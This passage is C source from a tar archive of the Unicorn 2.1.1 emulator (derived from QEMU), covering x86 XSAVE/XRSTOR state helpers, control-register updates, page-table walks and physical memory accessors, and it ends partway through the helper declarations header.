do_xsave_mxcsr(env, ptr, ra); /* Fast FXSAVE leaves out the XMM registers */ if (!(env->efer & MSR_EFER_FFXSR) || (env->hflags & HF_CPL_MASK) || !(env->hflags & HF_LMA_MASK)) { do_xsave_sse(env, ptr, ra); } } } static uint64_t get_xinuse(CPUX86State *env) { uint64_t inuse = -1; /* For the most part, we don't track XINUSE. We could calculate it here for all components, but it's probably less work to simply indicate in use. That said, the state of BNDREGS is important enough to track in HFLAGS, so we might as well use that here. */ if ((env->hflags & HF_MPX_IU_MASK) == 0) { inuse &= ~XSTATE_BNDREGS_MASK; } return inuse; } static void do_xsave(CPUX86State *env, target_ulong ptr, uint64_t rfbm, uint64_t inuse, uint64_t opt, uintptr_t ra) { uint64_t old_bv, new_bv; /* The OS must have enabled XSAVE. */ if (!(env->cr[4] & CR4_OSXSAVE_MASK)) { raise_exception_ra(env, EXCP06_ILLOP, ra); } /* The operand must be 64 byte aligned. */ if (ptr & 63) { raise_exception_ra(env, EXCP0D_GPF, ra); } /* Never save anything not enabled by XCR0. */ rfbm &= env->xcr0; opt &= rfbm; if (opt & XSTATE_FP_MASK) { do_xsave_fpu(env, ptr, ra); } if (rfbm & XSTATE_SSE_MASK) { /* Note that saving MXCSR is not suppressed by XSAVEOPT. */ do_xsave_mxcsr(env, ptr, ra); } if (opt & XSTATE_SSE_MASK) { do_xsave_sse(env, ptr, ra); } if (opt & XSTATE_BNDREGS_MASK) { do_xsave_bndregs(env, ptr + XO(bndreg_state), ra); } if (opt & XSTATE_BNDCSR_MASK) { do_xsave_bndcsr(env, ptr + XO(bndcsr_state), ra); } if (opt & XSTATE_PKRU_MASK) { do_xsave_pkru(env, ptr + XO(pkru_state), ra); } /* Update the XSTATE_BV field. */ old_bv = cpu_ldq_data_ra(env, ptr + XO(header.xstate_bv), ra); new_bv = (old_bv & ~rfbm) | (inuse & rfbm); cpu_stq_data_ra(env, ptr + XO(header.xstate_bv), new_bv, ra); } void helper_xsave(CPUX86State *env, target_ulong ptr, uint64_t rfbm) { do_xsave(env, ptr, rfbm, get_xinuse(env), -1, GETPC()); } void helper_xsaveopt(CPUX86State *env, target_ulong ptr, uint64_t rfbm) { uint64_t inuse = get_xinuse(env); do_xsave(env, ptr, rfbm, inuse, inuse, GETPC()); } static void do_xrstor_fpu(CPUX86State *env, target_ulong ptr, uintptr_t ra) { int i, fpuc, fpus, fptag; target_ulong addr; fpuc = cpu_lduw_data_ra(env, ptr + XO(legacy.fcw), ra); fpus = cpu_lduw_data_ra(env, ptr + XO(legacy.fsw), ra); fptag = cpu_lduw_data_ra(env, ptr + XO(legacy.ftw), ra); cpu_set_fpuc(env, fpuc); cpu_set_fpus(env, fpus); fptag ^= 0xff; for (i = 0; i < 8; i++) { env->fptags[i] = ((fptag >> i) & 1); } addr = ptr + XO(legacy.fpregs); for (i = 0; i < 8; i++) { floatx80 tmp = helper_fldt(env, addr, ra); ST(i) = tmp; addr += 16; } } static void do_xrstor_mxcsr(CPUX86State *env, target_ulong ptr, uintptr_t ra) { cpu_set_mxcsr(env, cpu_ldl_data_ra(env, ptr + XO(legacy.mxcsr), ra)); } static void do_xrstor_sse(CPUX86State *env, target_ulong ptr, uintptr_t ra) { int i, nb_xmm_regs; target_ulong addr; if (env->hflags & HF_CS64_MASK) { nb_xmm_regs = 16; } else { nb_xmm_regs = 8; } addr = ptr + XO(legacy.xmm_regs); for (i = 0; i < nb_xmm_regs; i++) { env->xmm_regs[i].ZMM_Q(0) = cpu_ldq_data_ra(env, addr, ra); env->xmm_regs[i].ZMM_Q(1) = cpu_ldq_data_ra(env, addr + 8, ra); addr += 16; } } static void do_xrstor_bndregs(CPUX86State *env, target_ulong ptr, uintptr_t ra) { target_ulong addr = ptr + offsetof(XSaveBNDREG, bnd_regs); int i; for (i = 0; i < 4; i++, addr += 16) { env->bnd_regs[i].lb = cpu_ldq_data_ra(env, addr, ra); env->bnd_regs[i].ub = cpu_ldq_data_ra(env, addr + 8, ra); } } static void do_xrstor_bndcsr(CPUX86State *env, target_ulong ptr, uintptr_t ra) { /* FIXME: Extend highest implemented bit of linear address. */ env->bndcs_regs.cfgu = cpu_ldq_data_ra(env, ptr + offsetof(XSaveBNDCSR, bndcsr.cfgu), ra); env->bndcs_regs.sts = cpu_ldq_data_ra(env, ptr + offsetof(XSaveBNDCSR, bndcsr.sts), ra); } static void do_xrstor_pkru(CPUX86State *env, target_ulong ptr, uintptr_t ra) { env->pkru = cpu_ldq_data_ra(env, ptr, ra); } void helper_fxrstor(CPUX86State *env, target_ulong ptr) { uintptr_t ra = GETPC(); /* The operand must be 16 byte aligned */ if (ptr & 0xf) { raise_exception_ra(env, EXCP0D_GPF, ra); } do_xrstor_fpu(env, ptr, ra); if (env->cr[4] & CR4_OSFXSR_MASK) { do_xrstor_mxcsr(env, ptr, ra); /* Fast FXRSTOR leaves out the XMM registers */ if (!(env->efer & MSR_EFER_FFXSR) || (env->hflags & HF_CPL_MASK) || !(env->hflags & HF_LMA_MASK)) { do_xrstor_sse(env, ptr, ra); } } } void helper_xrstor(CPUX86State *env, target_ulong ptr, uint64_t rfbm) { uintptr_t ra = GETPC(); uint64_t xstate_bv, xcomp_bv, reserve0; rfbm &= env->xcr0; /* The OS must have enabled XSAVE. */ if (!(env->cr[4] & CR4_OSXSAVE_MASK)) { raise_exception_ra(env, EXCP06_ILLOP, ra); } /* The operand must be 64 byte aligned. */ if (ptr & 63) { raise_exception_ra(env, EXCP0D_GPF, ra); } xstate_bv = cpu_ldq_data_ra(env, ptr + XO(header.xstate_bv), ra); if ((int64_t)xstate_bv < 0) { /* FIXME: Compact form. */ raise_exception_ra(env, EXCP0D_GPF, ra); } /* Standard form. */ /* The XSTATE_BV field must not set bits not present in XCR0. */ if (xstate_bv & ~env->xcr0) { raise_exception_ra(env, EXCP0D_GPF, ra); } /* The XCOMP_BV field must be zero. Note that, as of the April 2016 revision, the description of the XSAVE Header (Vol 1, Sec 13.4.2) describes only XCOMP_BV, but the description of the standard form of XRSTOR (Vol 1, Sec 13.8.1) checks bytes 23:8 for zero, which includes the next 64-bit field. */ xcomp_bv = cpu_ldq_data_ra(env, ptr + XO(header.xcomp_bv), ra); reserve0 = cpu_ldq_data_ra(env, ptr + XO(header.reserve0), ra); if (xcomp_bv || reserve0) { raise_exception_ra(env, EXCP0D_GPF, ra); } if (rfbm & XSTATE_FP_MASK) { if (xstate_bv & XSTATE_FP_MASK) { do_xrstor_fpu(env, ptr, ra); } else { do_fninit(env); memset(env->fpregs, 0, sizeof(env->fpregs)); } } if (rfbm & XSTATE_SSE_MASK) { /* Note that the standard form of XRSTOR loads MXCSR from memory whether or not the XSTATE_BV bit is set. */ do_xrstor_mxcsr(env, ptr, ra); if (xstate_bv & XSTATE_SSE_MASK) { do_xrstor_sse(env, ptr, ra); } else { /* ??? When AVX is implemented, we may have to be more selective in the clearing. */ memset(env->xmm_regs, 0, sizeof(env->xmm_regs)); } } if (rfbm & XSTATE_BNDREGS_MASK) { if (xstate_bv & XSTATE_BNDREGS_MASK) { do_xrstor_bndregs(env, ptr + XO(bndreg_state), ra); env->hflags |= HF_MPX_IU_MASK; } else { memset(env->bnd_regs, 0, sizeof(env->bnd_regs)); env->hflags &= ~HF_MPX_IU_MASK; } } if (rfbm & XSTATE_BNDCSR_MASK) { if (xstate_bv & XSTATE_BNDCSR_MASK) { do_xrstor_bndcsr(env, ptr + XO(bndcsr_state), ra); } else { memset(&env->bndcs_regs, 0, sizeof(env->bndcs_regs)); } cpu_sync_bndcs_hflags(env); } if (rfbm & XSTATE_PKRU_MASK) { uint64_t old_pkru = env->pkru; if (xstate_bv & XSTATE_PKRU_MASK) { do_xrstor_pkru(env, ptr + XO(pkru_state), ra); } else { env->pkru = 0; } if (env->pkru != old_pkru) { CPUState *cs = env_cpu(env); tlb_flush(cs); } } } #undef XO uint64_t helper_xgetbv(CPUX86State *env, uint32_t ecx) { /* The OS must have enabled XSAVE. */ if (!(env->cr[4] & CR4_OSXSAVE_MASK)) { raise_exception_ra(env, EXCP06_ILLOP, GETPC()); } switch (ecx) { case 0: return env->xcr0; case 1: if (env->features[FEAT_XSAVE] & CPUID_XSAVE_XGETBV1) { return env->xcr0 & get_xinuse(env); } break; } raise_exception_ra(env, EXCP0D_GPF, GETPC()); } void helper_xsetbv(CPUX86State *env, uint32_t ecx, uint64_t mask) { uint32_t dummy, ena_lo, ena_hi; uint64_t ena; /* The OS must have enabled XSAVE. */ if (!(env->cr[4] & CR4_OSXSAVE_MASK)) { raise_exception_ra(env, EXCP06_ILLOP, GETPC()); } /* Only XCR0 is defined at present; the FPU may not be disabled. */ if (ecx != 0 || (mask & XSTATE_FP_MASK) == 0) { goto do_gpf; } /* Disallow enabling unimplemented features. */ cpu_x86_cpuid(env, 0x0d, 0, &ena_lo, &dummy, &dummy, &ena_hi); ena = ((uint64_t)ena_hi << 32) | ena_lo; if (mask & ~ena) { goto do_gpf; } /* Disallow enabling only half of MPX. */ if ((mask ^ (mask * (XSTATE_BNDCSR_MASK / XSTATE_BNDREGS_MASK))) & XSTATE_BNDCSR_MASK) { goto do_gpf; } env->xcr0 = mask; cpu_sync_bndcs_hflags(env); return; do_gpf: raise_exception_ra(env, EXCP0D_GPF, GETPC()); } /* MMX/SSE */ /* XXX: optimize by storing fptt and fptags in the static cpu state */ #define SSE_DAZ 0x0040 #define SSE_RC_MASK 0x6000 #define SSE_RC_NEAR 0x0000 #define SSE_RC_DOWN 0x2000 #define SSE_RC_UP 0x4000 #define SSE_RC_CHOP 0x6000 #define SSE_FZ 0x8000 void update_mxcsr_status(CPUX86State *env) { uint32_t mxcsr = env->mxcsr; int rnd_type; /* set rounding mode */ switch (mxcsr & SSE_RC_MASK) { default: case SSE_RC_NEAR: rnd_type = float_round_nearest_even; break; case SSE_RC_DOWN: rnd_type = float_round_down; break; case SSE_RC_UP: rnd_type = float_round_up; break; case SSE_RC_CHOP: rnd_type = float_round_to_zero; break; } set_float_rounding_mode(rnd_type, &env->sse_status); /* set denormals are zero */ set_flush_inputs_to_zero((mxcsr & SSE_DAZ) ? 1 : 0, &env->sse_status); /* set flush to zero */ set_flush_to_zero((mxcsr & SSE_FZ) ? 1 : 0, &env->fp_status); } void helper_ldmxcsr(CPUX86State *env, uint32_t val) { cpu_set_mxcsr(env, val); } void helper_enter_mmx(CPUX86State *env) { env->fpstt = 0; *(uint32_t *)(env->fptags) = 0; *(uint32_t *)(env->fptags + 4) = 0; } void helper_emms(CPUX86State *env) { /* set to empty state */ *(uint32_t *)(env->fptags) = 0x01010101; *(uint32_t *)(env->fptags + 4) = 0x01010101; } /* XXX: suppress */ void helper_movq(CPUX86State *env, void *d, void *s) { *(uint64_t *)d = *(uint64_t *)s; } #define SHIFT 0 #include "ops_sse.h" #define SHIFT 1 #include "ops_sse.h" ��������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/helper.c�������������������������������������������������������������0000664�0000000�0000000�00000036027�14675241067�0017565�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������/* * i386 helpers (without register variable usage) * * Copyright (c) 2003 Fabrice Bellard * * This library is free software; you can redistribute it and/or * modify it under the terms of the GNU Lesser General Public * License as published by the Free Software Foundation; either * version 2 of the License, or (at your option) any later version. * * This library is distributed in the hope that it will be useful, * but WITHOUT ANY WARRANTY; without even the implied warranty of * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU * Lesser General Public License for more details. * * You should have received a copy of the GNU Lesser General Public * License along with this library; if not, see <http://www.gnu.org/licenses/>. */ #include "qemu/osdep.h" #include "cpu.h" #include "exec/exec-all.h" #include "sysemu/tcg.h" void cpu_sync_bndcs_hflags(CPUX86State *env) { uint32_t hflags = env->hflags; uint32_t hflags2 = env->hflags2; uint32_t bndcsr; if ((hflags & HF_CPL_MASK) == 3) { bndcsr = env->bndcs_regs.cfgu; } else { bndcsr = env->msr_bndcfgs; } if ((env->cr[4] & CR4_OSXSAVE_MASK) && (env->xcr0 & XSTATE_BNDCSR_MASK) && (bndcsr & BNDCFG_ENABLE)) { hflags |= HF_MPX_EN_MASK; } else { hflags &= ~HF_MPX_EN_MASK; } if (bndcsr & BNDCFG_BNDPRESERVE) { hflags2 |= HF2_MPX_PR_MASK; } else { hflags2 &= ~HF2_MPX_PR_MASK; } env->hflags = hflags; env->hflags2 = hflags2; } static void cpu_x86_version(CPUX86State *env, int *family, int *model) { int cpuver = env->cpuid_version; if (family == NULL || model == NULL) { return; } *family = (cpuver >> 8) & 0x0f; *model = ((cpuver >> 12) & 0xf0) + ((cpuver >> 4) & 0x0f); } /* Broadcast MCA signal for processor version 06H_EH and above */ int cpu_x86_support_mca_broadcast(CPUX86State *env) { int family = 0; int model = 0; cpu_x86_version(env, &family, &model); if ((family == 6 && model >= 14) || family > 6) { return 1; } return 0; } /***********************************************************/ /* x86 mmu */ /* XXX: add PGE support */ void x86_cpu_set_a20(X86CPU *cpu, int a20_state) { CPUX86State *env = &cpu->env; a20_state = (a20_state != 0); if (a20_state != ((env->a20_mask >> 20) & 1)) { CPUState *cs = CPU(cpu); qemu_log_mask(CPU_LOG_MMU, "A20 update: a20=%d\n", a20_state); /* if the cpu is currently executing code, we must unlink it and all the potentially executing TB */ cpu_interrupt(cs, CPU_INTERRUPT_EXITTB); /* when a20 is changed, all the MMU mappings are invalid, so we must flush everything */ tlb_flush(cs); env->a20_mask = ~(1 << 20) | (a20_state << 20); } } void cpu_x86_update_cr0(CPUX86State *env, uint32_t new_cr0) { X86CPU *cpu = env_archcpu(env); int pe_state; qemu_log_mask(CPU_LOG_MMU, "CR0 update: CR0=0x%08x\n", new_cr0); if ((new_cr0 & (CR0_PG_MASK | CR0_WP_MASK | CR0_PE_MASK)) != (env->cr[0] & (CR0_PG_MASK | CR0_WP_MASK | CR0_PE_MASK))) { tlb_flush(CPU(cpu)); } #ifdef TARGET_X86_64 if (!(env->cr[0] & CR0_PG_MASK) && (new_cr0 & CR0_PG_MASK) && (env->efer & MSR_EFER_LME)) { /* enter in long mode */ /* XXX: generate an exception */ if (!(env->cr[4] & CR4_PAE_MASK)) return; env->efer |= MSR_EFER_LMA; env->hflags |= HF_LMA_MASK; } else if ((env->cr[0] & CR0_PG_MASK) && !(new_cr0 & CR0_PG_MASK) && (env->efer & MSR_EFER_LMA)) { /* exit long mode */ env->efer &= ~MSR_EFER_LMA; env->hflags &= ~(HF_LMA_MASK | HF_CS64_MASK); env->eip &= 0xffffffff; } #endif env->cr[0] = new_cr0 | CR0_ET_MASK; /* update PE flag in hidden flags */ pe_state = (env->cr[0] & CR0_PE_MASK); env->hflags = (env->hflags & ~HF_PE_MASK) | (pe_state << HF_PE_SHIFT); /* ensure that ADDSEG is always set in real mode */ env->hflags |= ((pe_state ^ 1) << HF_ADDSEG_SHIFT); /* update FPU flags */ env->hflags = (env->hflags & ~(HF_MP_MASK | HF_EM_MASK | HF_TS_MASK)) | ((new_cr0 << (HF_MP_SHIFT - 1)) & (HF_MP_MASK | HF_EM_MASK | HF_TS_MASK)); } /* XXX: in legacy PAE mode, generate a GPF if reserved bits are set in the PDPT */ void cpu_x86_update_cr3(CPUX86State *env, target_ulong new_cr3) { env->cr[3] = new_cr3; if (env->cr[0] & CR0_PG_MASK) { qemu_log_mask(CPU_LOG_MMU, "CR3 update: CR3=" TARGET_FMT_lx "\n", new_cr3); tlb_flush(env_cpu(env)); } } void cpu_x86_update_cr4(CPUX86State *env, uint32_t new_cr4) { uint32_t hflags; #if defined(DEBUG_MMU) printf("CR4 update: %08x -> %08x\n", (uint32_t)env->cr[4], new_cr4); #endif if ((new_cr4 ^ env->cr[4]) & (CR4_PGE_MASK | CR4_PAE_MASK | CR4_PSE_MASK | CR4_SMEP_MASK | CR4_SMAP_MASK | CR4_LA57_MASK)) { tlb_flush(env_cpu(env)); } /* Clear bits we're going to recompute. */ hflags = env->hflags & ~(HF_OSFXSR_MASK | HF_SMAP_MASK); /* SSE handling */ if (!(env->features[FEAT_1_EDX] & CPUID_SSE)) { new_cr4 &= ~CR4_OSFXSR_MASK; } if (new_cr4 & CR4_OSFXSR_MASK) { hflags |= HF_OSFXSR_MASK; } if (!(env->features[FEAT_7_0_EBX] & CPUID_7_0_EBX_SMAP)) { new_cr4 &= ~CR4_SMAP_MASK; } if (new_cr4 & CR4_SMAP_MASK) { hflags |= HF_SMAP_MASK; } if (!(env->features[FEAT_7_0_ECX] & CPUID_7_0_ECX_PKU)) { new_cr4 &= ~CR4_PKE_MASK; } env->cr[4] = new_cr4; env->hflags = hflags; cpu_sync_bndcs_hflags(env); } hwaddr x86_cpu_get_phys_page_attrs_debug(CPUState *cs, vaddr addr, MemTxAttrs *attrs) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; target_ulong pde_addr, pte_addr; uint64_t pte; int32_t a20_mask; uint32_t page_offset; int page_size; *attrs = cpu_get_mem_attrs(env); a20_mask = x86_get_a20_mask(env); if (!(env->cr[0] & CR0_PG_MASK)) { pte = addr & a20_mask; page_size = 4096; } else if (env->cr[4] & CR4_PAE_MASK) { target_ulong pdpe_addr; uint64_t pde, pdpe; #ifdef TARGET_X86_64 if (env->hflags & HF_LMA_MASK) { bool la57 = env->cr[4] & CR4_LA57_MASK; uint64_t pml5e_addr, pml5e; uint64_t pml4e_addr, pml4e; int32_t sext; /* test virtual address sign extension */ sext = la57 ? (int64_t)addr >> 56 : (int64_t)addr >> 47; if (sext != 0 && sext != -1) { return -1; } if (la57) { pml5e_addr = ((env->cr[3] & ~0xfff) + (((addr >> 48) & 0x1ff) << 3)) & a20_mask; pml5e = x86_ldq_phys(cs, pml5e_addr); if (!(pml5e & PG_PRESENT_MASK)) { return -1; } } else { pml5e = env->cr[3]; } pml4e_addr = ((pml5e & PG_ADDRESS_MASK) + (((addr >> 39) & 0x1ff) << 3)) & a20_mask; pml4e = x86_ldq_phys(cs, pml4e_addr); if (!(pml4e & PG_PRESENT_MASK)) { return -1; } pdpe_addr = ((pml4e & PG_ADDRESS_MASK) + (((addr >> 30) & 0x1ff) << 3)) & a20_mask; pdpe = x86_ldq_phys(cs, pdpe_addr); if (!(pdpe & PG_PRESENT_MASK)) { return -1; } if (pdpe & PG_PSE_MASK) { page_size = 1024 * 1024 * 1024; pte = pdpe; goto out; } } else #endif { pdpe_addr = ((env->cr[3] & ~0x1f) + ((addr >> 27) & 0x18)) & a20_mask; pdpe = x86_ldq_phys(cs, pdpe_addr); if (!(pdpe & PG_PRESENT_MASK)) return -1; } pde_addr = ((pdpe & PG_ADDRESS_MASK) + (((addr >> 21) & 0x1ff) << 3)) & a20_mask; pde = x86_ldq_phys(cs, pde_addr); if (!(pde & PG_PRESENT_MASK)) { return -1; } if (pde & PG_PSE_MASK) { /* 2 MB page */ page_size = 2048 * 1024; pte = pde; } else { /* 4 KB page */ pte_addr = ((pde & PG_ADDRESS_MASK) + (((addr >> 12) & 0x1ff) << 3)) & a20_mask; page_size = 4096; pte = x86_ldq_phys(cs, pte_addr); } if (!(pte & PG_PRESENT_MASK)) { return -1; } } else { uint32_t pde; /* page directory entry */ pde_addr = ((env->cr[3] & ~0xfff) + ((addr >> 20) & 0xffc)) & a20_mask; pde = x86_ldl_phys(cs, pde_addr); if (!(pde & PG_PRESENT_MASK)) return -1; if ((pde & PG_PSE_MASK) && (env->cr[4] & CR4_PSE_MASK)) { pte = pde | ((pde & 0x1fe000LL) << (32 - 13)); page_size = 4096 * 1024; } else { /* page directory entry */ pte_addr = ((pde & ~0xfff) + ((addr >> 10) & 0xffc)) & a20_mask; pte = x86_ldl_phys(cs, pte_addr); if (!(pte & PG_PRESENT_MASK)) { return -1; } page_size = 4096; } pte = pte & a20_mask; } #ifdef TARGET_X86_64 out: #endif pte &= PG_ADDRESS_MASK & ~(page_size - 1); page_offset = (addr & TARGET_PAGE_MASK) & (page_size - 1); return pte | page_offset; } int cpu_x86_get_descr_debug(CPUX86State *env, unsigned int selector, target_ulong *base, unsigned int *limit, unsigned int *flags) { CPUState *cs = env_cpu(env); SegmentCache *dt; target_ulong ptr; uint32_t e1, e2; int index; if (selector & 0x4) dt = &env->ldt; else dt = &env->gdt; index = selector & ~7; ptr = dt->base + index; if ((index + 7) > dt->limit || cpu_memory_rw_debug(cs, ptr, (uint8_t *)&e1, sizeof(e1), 0) != 0 || cpu_memory_rw_debug(cs, ptr+4, (uint8_t *)&e2, sizeof(e2), 0) != 0) return 0; *base = ((e1 >> 16) | ((e2 & 0xff) << 16) | (e2 & 0xff000000)); *limit = (e1 & 0xffff) | (e2 & 0x000f0000); if (e2 & DESC_G_MASK) *limit = (*limit << 12) | 0xfff; *flags = e2; return 1; } void do_cpu_init(X86CPU *cpu) { CPUState *cs = CPU(cpu); CPUX86State *env = &cpu->env; CPUX86State *save = g_new(CPUX86State, 1); int sipi = cs->interrupt_request & CPU_INTERRUPT_SIPI; *save = *env; cpu_reset(cs); cs->interrupt_request = sipi; memcpy(&env->start_init_save, &save->start_init_save, offsetof(CPUX86State, end_init_save) - offsetof(CPUX86State, start_init_save)); g_free(save); // apic_init_reset(cpu->apic_state); } void do_cpu_sipi(X86CPU *cpu) { // apic_sipi(cpu->apic_state); } /* Frob eflags into and out of the CPU temporary format. */ void x86_cpu_exec_enter(CPUState *cs) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; CC_SRC = env->eflags & (CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C); env->df = 1 - (2 * ((env->eflags >> 10) & 1)); CC_OP = CC_OP_EFLAGS; env->eflags &= ~(DF_MASK | CC_O | CC_S | CC_Z | CC_A | CC_P | CC_C); } void x86_cpu_exec_exit(CPUState *cs) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; env->eflags = cpu_compute_eflags(env); } uint8_t x86_ldub_phys(CPUState *cs, hwaddr addr) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; MemTxAttrs attrs = cpu_get_mem_attrs(env); AddressSpace *as = cpu_addressspace(cs, attrs); #ifdef UNICORN_ARCH_POSTFIX return glue(address_space_ldub, UNICORN_ARCH_POSTFIX)(as->uc, as, addr, attrs, NULL); #else return address_space_ldub(as->uc, as, addr, attrs, NULL); #endif } uint32_t x86_lduw_phys(CPUState *cs, hwaddr addr) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; MemTxAttrs attrs = cpu_get_mem_attrs(env); AddressSpace *as = cpu_addressspace(cs, attrs); #ifdef UNICORN_ARCH_POSTFIX return glue(address_space_lduw, UNICORN_ARCH_POSTFIX)(as->uc, as, addr, attrs, NULL); #else return address_space_lduw(as->uc, as, addr, attrs, NULL); #endif } uint32_t x86_ldl_phys(CPUState *cs, hwaddr addr) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; MemTxAttrs attrs = cpu_get_mem_attrs(env); AddressSpace *as = cpu_addressspace(cs, attrs); #ifdef UNICORN_ARCH_POSTFIX return glue(address_space_ldl, UNICORN_ARCH_POSTFIX)(as->uc, as, addr, attrs, NULL); #else return address_space_ldl(as->uc, as, addr, attrs, NULL); #endif } uint64_t x86_ldq_phys(CPUState *cs, hwaddr addr) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; MemTxAttrs attrs = cpu_get_mem_attrs(env); AddressSpace *as = cpu_addressspace(cs, attrs); #ifdef UNICORN_ARCH_POSTFIX return glue(address_space_ldq, UNICORN_ARCH_POSTFIX)(as->uc, as, addr, attrs, NULL); #else return address_space_ldq(as->uc, as, addr, attrs, NULL); #endif } void x86_stb_phys(CPUState *cs, hwaddr addr, uint8_t val) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; MemTxAttrs attrs = cpu_get_mem_attrs(env); AddressSpace *as = cpu_addressspace(cs, attrs); #ifdef UNICORN_ARCH_POSTFIX glue(address_space_stb, UNICORN_ARCH_POSTFIX)(as->uc, as, addr, val, attrs, NULL); #else address_space_stb(as->uc, as, addr, val, attrs, NULL); #endif } void x86_stl_phys_notdirty(CPUState *cs, hwaddr addr, uint32_t val) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; MemTxAttrs attrs = cpu_get_mem_attrs(env); AddressSpace *as = cpu_addressspace(cs, attrs); #ifdef UNICORN_ARCH_POSTFIX glue(address_space_stl_notdirty, UNICORN_ARCH_POSTFIX)(as->uc, as, addr, val, attrs, NULL); #else address_space_stl_notdirty(as->uc, as, addr, val, attrs, NULL); #endif } void x86_stw_phys(CPUState *cs, hwaddr addr, uint32_t val) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; MemTxAttrs attrs = cpu_get_mem_attrs(env); AddressSpace *as = cpu_addressspace(cs, attrs); #ifdef UNICORN_ARCH_POSTFIX glue(address_space_stw,UNICORN_ARCH_POSTFIX)(as->uc, as, addr, val, attrs, NULL); #else address_space_stw(as->uc, as, addr, val, attrs, NULL); #endif } void x86_stl_phys(CPUState *cs, hwaddr addr, uint32_t val) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; MemTxAttrs attrs = cpu_get_mem_attrs(env); AddressSpace *as = cpu_addressspace(cs, attrs); #ifdef UNICORN_ARCH_POSTFIX glue(address_space_stl, UNICORN_ARCH_POSTFIX)(as->uc, as, addr, val, attrs, NULL); #else address_space_stl(as->uc, as, addr, val, attrs, NULL); #endif } void x86_stq_phys(CPUState *cs, hwaddr addr, uint64_t val) { X86CPU *cpu = X86_CPU(cs); CPUX86State *env = &cpu->env; MemTxAttrs attrs = cpu_get_mem_attrs(env); AddressSpace *as = cpu_addressspace(cs, attrs); #ifdef UNICORN_ARCH_POSTFIX glue(address_space_stq, UNICORN_ARCH_POSTFIX)(as->uc, as, addr, val, attrs, NULL); #else address_space_stq(as->uc, as, addr, val, attrs, NULL); #endif } ���������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������������unicorn-2.1.1/qemu/target/i386/helper.h�������������������������������������������������������������0000664�0000000�0000000�00000020250�14675241067�0017561�0����������������������������������������������������������������������������������������������������ustar�00root����������������������������root����������������������������0000000�0000000������������������������������������������������������������������������������������������������������������������������������������������������������������������������DEF_HELPER_4(uc_tracecode, void, i32, i32, ptr, i64) DEF_HELPER_6(uc_traceopcode, void, ptr, i64, i64, i32, ptr, i64) DEF_HELPER_FLAGS_4(cc_compute_all, TCG_CALL_NO_RWG_SE, tl, tl, tl, tl, int) DEF_HELPER_FLAGS_4(cc_compute_c, TCG_CALL_NO_RWG_SE, tl, tl, tl, tl, int) DEF_HELPER_3(write_eflags, void, env, tl, i32) DEF_HELPER_1(read_eflags, tl, env) DEF_HELPER_2(divb_AL, void, env, tl) DEF_HELPER_2(idivb_AL, void, env, tl) DEF_HELPER_2(divw_AX, void, env, tl) DEF_HELPER_2(idivw_AX, void, env, tl) DEF_HELPER_2(divl_EAX, void, env, tl) DEF_HELPER_2(idivl_EAX, void, env, tl) #ifdef TARGET_X86_64 DEF_HELPER_2(divq_EAX, void, env, tl) DEF_HELPER_2(idivq_EAX, void, env, tl) #endif DEF_HELPER_FLAGS_2(cr4_testbit, TCG_CALL_NO_WG, void, env, i32) DEF_HELPER_FLAGS_2(bndck, TCG_CALL_NO_WG, void, env, i32) DEF_HELPER_FLAGS_3(bndldx32, TCG_CALL_NO_WG, i64, env, tl, tl) DEF_HELPER_FLAGS_3(bndldx64, TCG_CALL_NO_WG, i64, env, tl, tl) DEF_HELPER_FLAGS_5(bndstx32, TCG_CALL_NO_WG, void, env, tl, tl, i64, i64) DEF_HELPER_FLAGS_5(bndstx64, TCG_CALL_NO_WG, void, env, tl, tl, i64, i64) DEF_HELPER_1(bnd_jmp, void, env) DEF_HELPER_2(aam, void, env, int) DEF_HELPER_2(aad, void, env, int) DEF_HELPER_1(aaa, void, env) DEF_HELPER_1(aas, void, env) DEF_HELPER_1(daa, void, env) DEF_HELPER_1(das, void, env) DEF_HELPER_2(lsl, tl, env, tl) DEF_HELPER_2(lar, tl, env, tl) DEF_HELPER_2(verr, void, env, tl) DEF_HELPER_2(verw, void, env, tl) DEF_HELPER_2(lldt, void, env, int) DEF_HELPER_2(ltr, void, env, int) DEF_HELPER_3(load_seg, void, env, int, int) DEF_HELPER_4(ljmp_protected, void, env, int, tl, tl) DEF_HELPER_5(lcall_real, void, env, int, tl, int, int) DEF_HELPER_5(lcall_protected, void, env, int, tl, int, tl) DEF_HELPER_2(iret_real, void, env, int) DEF_HELPER_3(iret_protected, void, env, int, int) DEF_HELPER_3(lret_protected, void, env, int, int) DEF_HELPER_2(read_crN, tl, env, int) DEF_HELPER_3(write_crN, void, env, int, tl) DEF_HELPER_2(lmsw, void, env, tl) DEF_HELPER_1(clts, void, env) DEF_HELPER_FLAGS_3(set_dr, TCG_CALL_NO_WG, void, env, int, tl) DEF_HELPER_FLAGS_2(get_dr, TCG_CALL_NO_WG, tl, env, int) DEF_HELPER_2(invlpg, void, env, tl) DEF_HELPER_2(sysenter, void, env, int) DEF_HELPER_2(sysexit, void, env, int) #ifdef TARGET_X86_64 DEF_HELPER_2(syscall, void, env, int) DEF_HELPER_2(sysret, void, env, int) #endif DEF_HELPER_2(hlt, void, env, int) DEF_HELPER_2(monitor, void, env, tl) DEF_HELPER_2(mwait, void, env, int) DEF_HELPER_2(pause, void, env, int) DEF_HELPER_1(debug, void, env) DEF_HELPER_1(reset_rf, void, env) DEF_HELPER_3(raise_interrupt, void, env, int, int) DEF_HELPER_2(raise_exception, void, 